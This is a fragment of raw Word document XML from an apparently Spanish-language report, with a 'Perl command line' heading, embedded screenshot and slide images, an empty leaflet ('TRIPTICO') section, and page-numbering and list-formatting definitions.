        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="153DE47C" w14:textId="77777777" w:rsidR="00774B16" w:rsidRPr="008C5A15" w:rsidRDefault="00774B16" w:rsidP="00774B16">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C5A15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Perl command line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027324EB" w14:textId="77777777" w:rsidR="00774B16" w:rsidRDefault="00774B16" w:rsidP="00774B16">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C5A15">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="463871EC" wp14:editId="7E774552">
            <wp:extent cx="5943600" cy="636905"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="386845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5357" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId85"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="636905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="165C03DF" w14:textId="77777777" w:rsidR="00774B16" w:rsidRPr="006A124B" w:rsidRDefault="00774B16" w:rsidP="00774B16">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C5A15">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40AB4BC8" wp14:editId="06870E34">
            <wp:extent cx="5943600" cy="1150620"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="831142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2276" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId86"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1150620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2975E2" w14:textId="4B0B0229" w:rsidR="00774B16" w:rsidRDefault="00774B16" w:rsidP="006C3776">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="005EAC26" w14:textId="4AFEEBB2" w:rsidR="00774B16" w:rsidRDefault="00774B16" w:rsidP="006C3776">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30A4E6DB" w14:textId="41392398" w:rsidR="00774B16" w:rsidRDefault="00774B16" w:rsidP="006C3776">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4817555C" w14:textId="4F5A17F0" w:rsidR="00774B16" w:rsidRDefault="00E27684" w:rsidP="006C3776">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DIAPOSITIVAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF1AD38" w14:textId="77777777" w:rsidR="00E27684" w:rsidRDefault="00E27684" w:rsidP="00E27684">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46EFA4B8" wp14:editId="08713B74">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1903563909" name="Imagen 190356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b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31C11520" wp14:editId="5C8D6468">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1903563945" name="Imagen 19035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45" name="Imagen 190356394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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C9D1057" wp14:editId="576B7531">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1903563946" name="Imagen 19035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46" name="Imagen 190356394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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F6747B9" wp14:editId="3458D110">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1903563947" name="Imagen 19035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47" name="Imagen 190356394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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AEAA7EB" wp14:editId="4B2775F7">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1903563948" name="Imagen 19035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48" name="Imagen 19035639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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AFDDB8E" wp14:editId="50F11E24">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1903563949" name="Imagen 19035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49" name="Imagen 190356394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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DEABA58" wp14:editId="1B5AFBF0">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1903563950" name="Imagen 19035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50" name="Imagen 190356395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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26E7435F" wp14:editId="229CC01A">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1903563951" name="Imagen 190356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51" name="Imagen 190356395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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B388354" wp14:editId="0E5D9E9E">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1903563952" name="Imagen 19035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52" name="Imagen 190356395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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D2D4140" wp14:editId="230065BE">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1903563953" name="Imagen 19035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53" name="Imagen 190356395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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F058DA3" wp14:editId="377FFD89">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1903563954" name="Imagen 19035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54" name="Imagen 190356395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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FF6ECD5" wp14:editId="3B08C15A">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1903563955" name="Imagen 190356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55" name="Imagen 190356395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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B8D9FB6" wp14:editId="28358A16">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1903563956" name="Imagen 19035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56" name="Imagen 190356395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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05AC70A4" wp14:editId="6206A3FC">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1903563957" name="Imagen 19035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57" name="Imagen 190356395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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A7C1148" wp14:editId="7B735EF6">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1903563958" name="Imagen 19035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58" name="Imagen 190356395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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17846126" wp14:editId="1BEF6D7B">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1903563959" name="Imagen 19035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59" name="Imagen 190356395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lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F9CEFAC" wp14:editId="1E984F62">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1903563960" name="Imagen 190356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60" name="Imagen 190356396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16E50C" w14:textId="4E8F0CB1" w:rsidR="00E27684" w:rsidRDefault="00E27684" w:rsidP="00E27684">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79FF5455" wp14:editId="6D7E305C">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1903563961" name="Imagen 19035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961" name="Imagen 190356396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E6C9DA" w14:textId="45E0589D" w:rsidR="00E27684" w:rsidRDefault="00E27684" w:rsidP="00E27684">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AB46636" w14:textId="05C20408" w:rsidR="00E27684" w:rsidRDefault="00E27684" w:rsidP="00E27684">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F215549" w14:textId="3CD1BC11" w:rsidR="00E27684" w:rsidRDefault="00E27684" w:rsidP="00E27684">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5528BD67" w14:textId="78812782" w:rsidR="00E27684" w:rsidRDefault="00E27684" w:rsidP="00E27684">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>TRIPTICO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD5ADC6" w14:textId="77777777" w:rsidR="00E27684" w:rsidRPr="00E27684" w:rsidRDefault="00E27684" w:rsidP="00E27684">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00E27684" w:rsidRPr="00E27684" w:rsidSect="00737B42">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AEE8" w14:textId="77777777" w:rsidR="00C1443F" w:rsidRDefault="00C1443F" w:rsidP="00DD0CA3">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="60F276BD" w14:textId="77777777" w:rsidR="00C1443F" w:rsidRDefault="00C1443F" w:rsidP="00DD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5956"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="7AD5EAEB" w14:textId="17CA021F" w:rsidR="00DD0CA3" w:rsidRDefault="00DD0CA3">
        <w:pPr>
          <w:pStyle w:val="Piedepgina"/>
          <w:jc w:val="right"/>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="124FBE8E" w14:textId="77777777" w:rsidR="00DD0CA3" w:rsidRDefault="00DD0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0C73" w14:textId="77777777" w:rsidR="00C1443F" w:rsidRDefault="00C1443F" w:rsidP="00DD0CA3">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0D824E12" w14:textId="77777777" w:rsidR="00C1443F" w:rsidRDefault="00C1443F" w:rsidP="00DD0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E62"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="58D8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22E5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ADFC40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D534910"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3B2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E7B0F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5D32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3491"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E772C1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9E4A75"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="79D4399A"/>
    <w:lvl w:ilvl="0" w:tplc="4468B6C6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8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72746790">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="126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67C0AD98">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="198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444C90EE">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="270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7E668078">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="342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668E3A0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="414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184A4BA4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="486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28DCDB66">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="558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82F0B9B0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="630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19275C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="381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7187D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="574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B23B0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="85D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01A8A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="95F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A403F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F3F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63456"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EAC2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C0E7A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1DD4D862"/>
    <w:lvl w:ilvl="0" w:tplc="BBE85568">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8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0D4EA79C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="126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80AA5A96">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="198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9D3A55DA">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="270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03F06F08">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="342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F2C055EE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="414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BA6BC7C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="486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9668AA2A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="558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79C4CB54">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="630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042C78"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6D945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59A4B46"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1530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C51E6E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="17BE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848E9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="943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01F31"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B7608E26"/>
    <w:lvl w:ilvl="0" w:tplc="DDB405E2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="512"/>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04184AE0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="125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D73492BC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="197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9D36AC0A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="269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BDAB5E2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="341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4E881252">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="413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0FD6CB44">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="485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99B677E2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="557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712024C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="629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0F2E13"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="166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22490"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A96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A792E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="742C41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F15"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ACC8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F6435"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="216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C3E84"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="212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41D77"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2FC8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95686"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4104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64AB9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C12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03DEB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4BA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F3FE5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="10D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44F8B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7A7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334F0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="463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D240B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C4EC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B0B5F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EDC081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79658B4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="620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57168"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0726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7C3FC0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AEB87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2444E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6F7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251D6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8FF6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B542F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C2E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D5DA0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2D72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C6783F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BF12A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2117B96"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F452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E580A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6522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B3EC4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="33E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377B60"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BD86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9969A2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="68C0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226050"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="70724CAA"/>
    <w:lvl w:ilvl="0" w:tplc="85906A26">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8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D48ECF02">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="126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F412E5C6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="198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A12E03F2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="270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C6648CAA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="342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FD0BC10">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="414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904234E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="486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C2EA10CC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="558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E2AC6F9E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="630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0F235D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BE5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C7DF5"/>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219047437">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="510409878">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="688142261">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1379165973">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1805391697">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="960721531">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1604874091">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="146483154">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="216624566">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1379739881">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1781147807">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="547648768">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1940749387">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1276329643">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="2126583994">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="867303646">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="637032285">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="841434614">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="555314624">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="2021198076">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="189925831">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1712655375">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1005865146">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1567690061">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1682704596">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1380283625">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1096052186">
    <w:abstractNumId w:val="30"/>
  </w:num>
